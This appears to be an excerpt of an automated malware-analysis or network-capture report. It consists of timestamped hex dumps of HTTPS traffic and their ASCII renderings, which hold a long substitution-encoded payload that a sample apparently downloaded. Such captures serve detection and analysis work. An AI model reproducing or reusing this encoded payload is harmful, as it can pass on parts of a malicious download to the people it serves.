                                                                                                                          2021-10-29 15:07:02 UTC2699INData Raw: 78 20 74 59 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 4f 78 52 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 4f 4f 59 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 59 6f 20 78 20 74 74 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 6b 51 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59
                                                                                                                          Data Ascii: x tY x Rt x OxE x Kt x OOk x OxR x OOQ x OOY x tY x Rt x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x OOY x tK x OxY x kO x Yo x tt x Rt x OxE x kQ x RQ x OxE x OOQ x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
                                                                                                                          2021-10-29 15:07:02 UTC2703INData Raw: 78 20 4b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 4f 78 20 78 20 74 6b 20 78 20 4f 78 52 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 6f 4f 20 78 20 59 59 20 78 20 4f 4f 74 20 78 20 4f 4f 4f 20 78 20 74 4b 20 78 20 4f 4f 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78 20 4b 74 20 78 20 4b 45 20 78 20 59 4f 20 78 20 51 78 20 78
                                                                                                                          Data Ascii: x Kk x RY x RY x RY x RY x RY x RY x RY x RY x OOo x OOx x tk x OxR x Kt x Yt x OoO x YY x Kt x Yt x OoO x YY x Kt x Yt x OoO x YY x OOt x OOO x tK x OOo x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x Kt x KE x YO x Qx x
                                                                                                                          2021-10-29 15:07:02 UTC2707INData Raw: 20 4b 74 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 4f 52 20 78 20 52 6b 20 78 20 52 74 20 78 20 4b 74 20 78 20 59 74 20 78 20 4f 4f 45 20 78 20 59 78 20 78 20 4f 78 52 20 78 20 4f 78 6b 20 78 20 59 45 20 78 20 51 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 6f 20 78 20 4f 78 51 20 78 20 4f 6f 78 20 78 20 51 74 20 78 20 4f 4f 6b 20 78 20 6b 59 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4b 45 20 78 20 6b 78 20 78 20 4f 78 52 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 4f
                                                                                                                          Data Ascii: Kt x kx x OxR x tO x Oox x tE x OxK x OOO x YK x OOR x Rk x Rt x Kt x Yt x OOE x Yx x OxR x Oxk x YE x Qx x RY x RY x RY x RY x RY x RY x RY x RY x OOo x OxQ x Oox x Qt x OOk x kY x OOR x tR x OOK x kk x tk x Ooo x KE x kx x OxR x Yo x OOY x tR x Rt x OO
                                                                                                                          2021-10-29 15:07:02 UTC2709INData Raw: 78 20 4f 4f 51 20 78 20 52 51 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 52 51 20 78 20 52 6b 20 78 20 52 52 20 78 20 52 59 20 78 20 52 51 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 4f 4f 51 20 78 20 4f 78 78 20 78 20 4f 4f 78 20 78 20 6b 6f 20 78 20 4b 6b 20 78 20 6b 4f 20 78 20 74 6f 20 78 20 4f 78 4b 20 78 20 52 59 20 78 20 6b 59 20 78 20 74 59 20 78 20 4f 78 4b 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20
                                                                                                                          Data Ascii: x OOQ x RQ x Rt x OxE x OOQ x RQ x Rk x RR x RY x RQ x Rt x OxE x OOQ x Oxx x OOx x ko x Kk x kO x to x OxK x RY x kY x tY x OxK x OxE x RY x RY x RY x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY x Kt x Kt x YR x RY
                                                                                                                          2021-10-29 15:07:02 UTC2713INData Raw: 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4b 6b 20 78 20 51 78 20 78 20 74 6b 20 78 20 4f 4f 52 20 78 20 4f 4f 78 20 78 20 4f 78 51 20 78 20 6b 52 20 78 20 6b 51 20 78 20 4f 6f 4f 20 78 20 4f 4f 4f 20 78 20 4f 6f 78 20 78 20 4f 4f 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 6f 20 78 20 4f 4f 52 20 78 20 6b 78 20 78 20 52 51 20 78
                                                                                                                          Data Ascii: x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x Kk x Qx x tk x OOR x OOx x OxQ x kR x kQ x OoO x OOO x Oox x OOK x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Yo x OOR x kx x RQ x
                                                                                                                          2021-10-29 15:07:02 UTC2717INData Raw: 4f 78 51 20 78 20 4f 6f 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 6b 4b 20 78 20 6b 4f 20 78 20 4b 6b 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 6b 45 20 78 20 4b 6b 20 78 20 4f 4f 4b 20 78 20 6b 6b 20 78 20 74 6b 20 78 20 4f 6f 6f 20 78 20 4f 78 45 20 78
                                                                                                                          Data Ascii: OxQ x Oox x Qt x OxE x kK x kO x Kk x OOK x kk x tk x Ooo x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOR x tR x kE x Kk x OOK x kk x tk x Ooo x OxE x
                                                                                                                          2021-10-29 15:07:02 UTC2721INData Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 59 74 20 78 20 59 52 20 78 20 4b 45 20 78 20 4f 4f 74 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59 20 78 20 4f 6f 4f 20 78 20 4f 78 6b 20 78 20 59 6f 20 78 20 59 59
                                                                                                                          Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x Yt x YR x KE x OOt x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY x OoO x Oxk x Yo x YY
                                                                                                                          2021-10-29 15:07:02 UTC2725INData Raw: 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 74 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 6b 78 20 78 20 59 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4b 74 20 78
                                                                                                                          Data Ascii: Rt x RY x RY x RY x RY x RY x OxE x RY x Rt x RY x RY x tE x Rt x RY x RY x RY x Rt x RY x OxE x tE x RY x RY x OOQ x tt x Rk x RY x RY x RY x RY x RY x Kt x OOQ x RY x RY x Kt x OOQ x RY x RY x RY x kx x Kt x Kt x RY x kx x YR x RY x RY x RY x Rk x Kt x
                                                                                                                          2021-10-29 15:07:02 UTC2729INData Raw: 20 59 45 20 78 20 6b 51 20 78 20 4f 78 78 20 78 20 4f 4f 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 74 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 6f 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 4b 45 20 78 20 6b 51 20 78 20 6b 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 45 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78 20 4b 45 20 78 20 6b 51 20 78 20 6b 52 20 78 20 4f 4f 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 78 51 20 78 20 74 78 20 78 20 51 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 59 45 20 78 20 4f 78 4b 20 78 20 6b 74 20 78 20 4f 4f 4f 20 78 20 52 59 20 78
                                                                                                                          Data Ascii: YE x kQ x Oxx x OOY x RY x kx x tQ x tx x Qt x OxE x Rk x Yo x OxK x kt x OOO x RY x KE x kQ x kR x OOE x RY x kx x OxQ x tx x Qt x OxE x Rk x YE x OxK x kt x OOO x RY x KE x kQ x kR x OOE x RY x kx x OxQ x tx x Qt x OxE x Rk x YE x OxK x kt x OOO x RY x
                                                                                                                          2021-10-29 15:07:02 UTC2733INData Raw: 78 78 20 78 20 4f 78 59 20 78 20 74 6f 20 78 20 52 51 20 78 20 6b 78 20 78 20 4f 4f 6f 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 59 20 78 20 74 6f 20 78 20 4f 4f 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 74 6f 20 78 20 6b 6b 20 78 20 4f 4f 78 20 78 20 4b 74 20 78 20 4f 4f 6f 20 78 20 4f 78 59 20 78 20 4f 78 59 20 78 20 52 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 74 20 78 20 4f 78 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 78 52 20 78 20 74 45 20 78 20 6b 6b 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4f 4f 4f 20 78 20 4f 6f 4f 20 78 20 74 78 20 78 20 59 52 20 78 20 4b 74 20 78 20 59 45 20 78 20 51 78 20 78 20 51 74 20 78 20 74 4b 20 78 20 4f 78 6f 20 78
                                                                                                                          Data Ascii: xx x OxY x to x RQ x kx x OOo x Rk x kO x kY x to x OOo x OxE x RY x RY x RY x Rt x Yx x OxK x to x kk x OOx x Kt x OOo x OxY x OxY x Rt x Kt x YK x tt x Oxt x Oxo x Kt x KE x OxR x tE x kk x Ooo x Kt x OOO x OoO x tx x YR x Kt x YE x Qx x Qt x tK x Oxo x
                                                                                                                          2021-10-29 15:07:02 UTC2737INData Raw: 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 6b 20 78 20 74 74 20 78 20 6b 6b 20 78 20 6b 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 6f 20 78 20 59 59 20 78 20 6b 78 20 78 20 6b 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 59 59 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 59 20 78 20 4b 45 20 78 20 4b 6b 20 78 20 4f 78 45 20 78 20 6b 78 20 78 20 59 74 20 78 20 59 4b 20 78 20 51 78 20 78 20 4f 78 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 51 6b 20 78 20 52 51 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4f 6f
                                                                                                                          Data Ascii: Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOk x tt x kk x kY x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOo x YY x kx x kk x Kt x KQ x Oxx x YY x OOQ x Kt x YY x KE x Kk x OxE x kx x Yt x YK x Qx x OxE x OOk x Kt x Qk x RQ x OOO x YK x Kt x Oo
                                                                                                                          2021-10-29 15:07:02 UTC2741INData Raw: 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 45 20 78 20 4f 4f 4b 20 78 20 4f 78 59 20 78 20 6b 4f 20 78 20 74 52 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 59 74 20 78 20 74 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 6b 78 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 78 78 20 78 20 59 59 20 78 20 4f 4f 51 20 78 20 4b 74 20 78 20 59 74 20 78 20 6b 6b 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 6b 78 20 78 20 4b 74 20 78 20 6b 52 20 78 20 59 4f 20 78 20
                                                                                                                          Data Ascii: x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x KE x OOK x OxY x kO x tR x Kt x Ooo x Yt x to x kx x Kt x Yt x kk x OxO x YR x kx x Kt x kR x YO x OOk x Rk x Kt x KQ x Oxx x YY x OOQ x Kt x Yt x kk x OxO x YR x kx x Kt x kR x YO x
                                                                                                                          2021-10-29 15:07:02 UTC2745INData Raw: 74 20 78 20 4f 4f 4f 20 78 20 6b 51 20 78 20 6b 59 20 78 20 6b 74 20 78 20 4b 74 20 78 20 59 4b 20 78 20 74 4f 20 78 20 52 74 20 78 20 52 52 20 78 20 4f 4f 6b 20 78 20 59 74 20 78 20 4f 4f 4f 20 78 20 6b 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 74 4b 20 78 20 4f 78 59 20 78 20 74 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4f 4f 59 20 78 20 4f 4f 51 20 78 20 4f 4f 4b 20 78 20 4f 78 4b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20
                                                                                                                          Data Ascii: t x OOO x kQ x kY x kt x Kt x YK x tO x Rt x RR x OOk x Yt x OOO x kY x RY x tR x OxK x tK x OxY x tE x RY x kx x OOY x OOQ x OOK x OxK x OOk x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x OOK x Kt x KE x OOk x Kt x Yt x Kt x Kt x Ooo x Kt
                                                                                                                          2021-10-29 15:07:02 UTC2749INData Raw: 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 4b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 4f 4b 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 6f 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20
                                                                                                                          Data Ascii: OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x YK x Kt x Kt x OOK x Kt x KE x OOk x Kt x Yt x Kt x Kt x Ooo x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x
                                                                                                                          2021-10-29 15:07:02 UTC2753INData Raw: 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4f 4f 52 20 78 20 74 6b 20 78 20 74 4b 20 78 20 74 6f 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 6b 20 78 20 4f 78 4f 20 78 20 6b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 59 4f 20 78 20 4f 78 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 74 52 20 78 20 4f 4f 6f 20 78 20 74 52 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 74 20 78 20 51 74 20 78 20 74 51 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 4f 4f 4b 20 78 20 4f 78 74 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4f 4f 52 20 78 20 74 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4b 74 20 78 20 59 59 20 78 20 6b 45 20 78 20 74 4f 20 78 20 74 52 20
                                                                                                                          Data Ascii: t x Kt x Kt x RY x YO x Oxk x OOk x Kt x OOR x tk x tK x to x Kt x YR x Rk x OxO x kt x Kt x Kt x RY x YO x Oxk x OOk x Kt x OOQ x tR x OOo x tR x Kt x YR x Rt x Qt x tQ x Kt x Kt x RY x OOK x Oxt x Oxo x Kt x OOR x tK x OOO x YO x Kt x YY x kE x tO x tR
                                                                                                                          2021-10-29 15:07:02 UTC2757INData Raw: 74 20 78 20 59 59 20 78 20 59 4f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 74 20 78 20 59 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 6b 78 20 78 20 4b 6b 20 78 20 51 51 20 78 20 59 59 20 78 20 4b 74 20 78 20 51 78 20 78 20 52 51 20 78 20 4b 6b 20 78 20 74 45 20 78 20 59 74 20 78 20 4f 78 52 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 74 6f 20 78 20 59 74 20 78 20 74 74 20 78 20 52 6b 20 78 20 52 59 20 78 20 6b 4f 20 78 20 74 78 20 78 20 6b 52 20 78 20 4f 78 74 20 78 20 4b 51 20 78 20 6b 45 20 78 20 52 59 20 78 20 4b 74 20 78 20 59 45 20 78 20 74 4b 20 78 20 6b 4b 20 78 20 4f 78 45 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 74 78 20 78 20 4f 78 74 20 78 20 59 45 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 51 20 78 20 51 6b 20 78 20 59 78
                                                                                                                          Data Ascii: t x YY x YO x Kt x KE x OOK x OOt x Yt x Kt x Kt x kx x Kk x QQ x YY x Kt x Qx x RQ x Kk x tE x Yt x OxR x OOY x Qx x to x Yt x tt x Rk x RY x kO x tx x kR x Oxt x KQ x kE x RY x Kt x YE x tK x kK x OxE x Oxo x Kt x tx x Oxt x YE x kx x Kt x OOQ x Qk x Yx
                                                                                                                          2021-10-29 15:07:02 UTC2761INData Raw: 4b 74 20 78 20 4b 45 20 78 20 4f 6f 6f 20 78 20 51 51 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 45 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 6f 20 78 20 4b 74 20 78 20 4b 45 20 78 20 4f 6f 6f 20 78 20 51 6b 20 78 20 59 6f 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4f 4f 59 20 78 20 59 78 20 78 20 4b 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 59 59 20 78 20 74 6b 20 78 20 4f 4f 6b 20 78 20 4f 78 45 20 78 20 4b 74 20
                                                                                                                          Data Ascii: Kt x KE x Ooo x QQ x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x OxE x Kt x KE x Ooo x Qk x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x Oxo x Kt x KE x Ooo x Qk x Yo x kx x Kt x OOY x Yx x KE x Rk x Kt x YY x tk x OOk x OxE x Kt
                                                                                                                          2021-10-29 15:07:02 UTC2765INData Raw: 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 4b 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 74 4b 20 78 20 4f 4f 78 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 51 51 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 78 6b 20 78 20 52 59 20 78 20 74 6f 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 6f 20 78 20 52 59 20 78 20 74 4f
                                                                                                                          Data Ascii: Y x RQ x tt x RY x Oxx x RY x RR x OoO x RY x tO x OOQ x RY x tY x OOQ x RR x kK x RY x RY x RY x RY x RY x RY x RR x tK x OOx x Rt x kQ x RY x kY x RY x RR x OoO x RY x tO x YR x RY x QQ x RY x RR x Oxk x RY x to x tE x RY x Oxx x RY x RR x OOo x RY x tO
                                                                                                                          2021-10-29 15:07:02 UTC2769INData Raw: 20 78 20 51 51 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 4b 20 78 20 52 59 20 78 20 52 51 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 6f 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 4f 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 6b 51 20 78 20 4f 4f 78 20 78 20 52 51 20 78 20 52 51 20 78 20 52 59 20 78 20 4f 78 78 20 78 20 6b 4f 20 78 20 52 52 20 78 20 4b 6b 20 78 20 52 59 20 78 20 74 4f 20 78 20 59 52 20 78 20 52 59 20 78 20 74 45
                                                                                                                          Data Ascii: x QQ x OOQ x RY x tK x RY x RQ x tt x RY x Oxx x RY x RR x OoO x RY x tO x OOQ x RY x tY x OOQ x RR x kO x RY x tO x OOQ x RY x Oxx x kO x RR x Ooo x RY x RY x RY x RY x RY x RY x RR x kQ x OOx x RQ x RQ x RY x Oxx x kO x RR x Kk x RY x tO x YR x RY x tE
